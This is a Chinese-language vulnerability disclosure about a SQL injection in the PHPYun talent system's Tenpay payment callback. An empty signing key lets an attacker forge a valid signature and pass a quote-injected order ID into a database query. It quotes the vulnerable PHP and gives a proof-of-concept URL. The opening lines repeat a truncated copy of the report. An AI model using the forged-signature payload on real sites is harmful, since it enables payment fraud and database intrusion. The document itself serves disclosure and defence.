### 简要描述: php云人才系统 注入漏洞 ### 详细说明: php云人才系统 注入漏洞 tenpay的KEY没有初始化 导致的注入漏洞! ``` /api/tenpay/return_url.php require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php"); require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php"); $db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']); /* 密钥 */ $key =$tenpay[sy_tenpaycode]; //密钥没有定义 ========= tenpay_data.php <?php /* * Created on 2012 * Link for shyflc@qq.com * This PHPYun.Rencai System Powered by PHPYun.com */ $tenpaydata=array("sy_weburl"=>"http://www.job.com","sy_tenpayid"=>"","sy_tenpaycode"=>"")//没有定义KEY 所以是空~~ ; ?> ========= /* 创建支付应答对象 */ $resHandler = new PayResponseHandler(); $resHandler->setKey($key);//还是key没有初始化~~ //判断签名 if($resHandler->isTenpaySign()) {//验证过程 /**********************************3 function isTenpaySign() { $cmdno = $this->getParameter("cmdno"); $pay_result = $this->getParameter("pay_result"); $date =...
### 简要描述: php云人才系统 注入漏洞 ### 详细说明: php云人才系统 注入漏洞 tenpay的KEY没有初始化 导致的注入漏洞! ``` /api/tenpay/return_url.php require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php"); require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php"); $db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']); /* 密钥 */ $key =$tenpay[sy_tenpaycode]; //密钥没有定义 ========= tenpay_data.php <?php /* * Created on 2012 * Link for shyflc@qq.com * This PHPYun.Rencai System Powered by PHPYun.com */ $tenpaydata=array("sy_weburl"=>"http://www.job.com","sy_tenpayid"=>"","sy_tenpaycode"=>"")//没有定义KEY 所以是空~~ ; ?> ========= /* 创建支付应答对象 */ $resHandler = new PayResponseHandler(); $resHandler->setKey($key);//还是key没有初始化~~ //判断签名 if($resHandler->isTenpaySign()) {//验证过程 /**********************************3 function isTenpaySign() { $cmdno = $this->getParameter("cmdno"); $pay_result = $this->getParameter("pay_result"); $date = $this->getParameter("date"); $transaction_id = $this->getParameter("transaction_id"); $sp_billno = $this->getParameter("sp_billno"); $total_fee = $this->getParameter("total_fee"); $fee_type = $this->getParameter("fee_type"); $attach = $this->getParameter("attach"); $key = $this->getKey(); $signPars = ""; //组织签名串 $signPars = "cmdno=" . $cmdno . "&" . "pay_result=" . $pay_result . "&" . "date=" . $date . "&" . "transaction_id=" . $transaction_id . "&" . "sp_billno=" . $sp_billno . "&" . "total_fee=" . $total_fee . "&" . "fee_type=" . $fee_type . "&" . "attach=" . $attach . "&" . "key=" . $key; $sign = strtolower(md5($signPars));//key是空 其他都是可控 我们之间就可以生成key 所以验证形同虚设 没有设置key的时候 ***********************************/ //交易单号 $transaction_id = $resHandler->getParameter("transaction_id"); //本站单号 $sp_billno = $resHandler->getParameter("sp_billno"); //金额,以分为单位 $total_fee = $resHandler->getParameter("total_fee"); //支付结果 $pay_result = $resHandler->getParameter("pay_result"); //类型 $attach = $resHandler->getParameter("attach"); if( "0" == $pay_result ) { //------------------------------ //处理业务开始 //------------------------------ //注意交易单不要重复处理 //注意判断返回金额 //处理本站信息开始 echo "select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'"; $sql=$db->query("select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'"); $row=mysql_fetch_array($sql); ``` ### 漏洞证明: 测试方法 http://127.0.0.1/yun3/api/tenpay/return_url.php?sign=ba7b763f604fb46432eac7fb601c55c1&sp_billno=1%27&pay_result=0 [<img src="https://images.seebug.org/upload/201311/22174047d7b1300aa8b4cb2ab4c0ff13d0fe5f89.jpg" alt="QQ截图20131122173445.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/22174047d7b1300aa8b4cb2ab4c0ff13d0fe5f89.jpg)
